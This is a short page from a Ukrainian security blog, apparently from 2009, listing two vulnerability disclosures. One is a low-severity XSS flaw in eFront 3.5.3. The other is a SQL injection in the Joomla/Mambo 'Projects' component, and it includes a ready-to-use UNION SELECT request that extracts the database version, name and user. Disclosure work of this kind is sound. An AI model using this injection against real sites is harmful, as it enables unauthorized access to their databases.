UASC

Міжсайтовий скриптинг в Efront

December 27th, 2009 Dimi4 6 comments

27.10.09
Програма: efront
Версія 3.5.3
Рівень небезпеки: Низький

Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.

Вразливість існує через недостатню фільтрацію вхідних данних в параметрах “lessons_ID“, “message” в сценарії index.php. Read more…

Categories: Вразливості \ vulnerabilities Tags: efront, vulnerabilities, XSS

Вразливості компонентів Joomla/Mambo (01)

October 12th, 2009 Dimi4 No comments

Компонент: Projects

Тип вразливості: SQL-injection

Знайдено: 27.09.2009

Знайшов: Dimi4index?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Read more…

Categories: Security Tags: com_nodes, com_projects, hack, Joomla, Mambo, SQL injection, SQLinj, vulnerabilities

Archive

Міжсайтовий скриптинг в Efront

Вразливості компонентів Joomla/Mambo (01)

Категорії

Наші веб-Друзі

Останні коментарі

Archives

Meta